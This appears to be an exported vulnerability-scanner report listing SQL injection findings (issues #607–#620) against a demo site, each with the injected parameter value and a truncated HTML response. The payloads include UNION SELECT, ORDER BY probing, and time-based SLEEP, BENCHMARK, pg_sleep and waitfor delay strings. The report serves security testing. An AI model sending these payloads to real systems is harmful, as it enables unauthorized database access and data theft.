href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #607\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" or \"\"*\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #608\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 18#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #609Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A\n')),4,5,6,7,8,9\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #610\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 4#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #611\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ')) or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #612\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 16\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #613\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 13--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #614\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" or \"\" \"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #615\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@deepfence.io \");waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #616\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #617\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #618\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AS INJECTX WHERE 1=1 AND 1=0--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #619\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #620Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives 